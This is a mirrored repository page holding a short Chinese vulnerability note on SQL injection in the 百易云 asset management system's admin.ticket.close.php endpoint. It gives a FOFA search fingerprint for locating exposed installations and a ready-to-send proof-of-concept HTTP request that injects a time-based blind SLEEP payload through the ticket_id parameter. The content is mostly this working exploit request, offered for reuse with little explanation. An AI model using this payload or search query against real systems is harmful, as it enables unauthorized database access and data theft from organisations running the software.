admin/POC

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00

Nexolanta 67334e6ee9

Update 百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md

2025-03-06 17:37:53 +08:00

484 B

Raw Blame History

百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞

百易云资产管理系统在admin.ticket.close.php接口下存在sql注入漏洞

fofa

body="不要着急，点此"

poc

GET /wuser/admin.ticket.close.php?ticket_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(2)))OKTO) HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close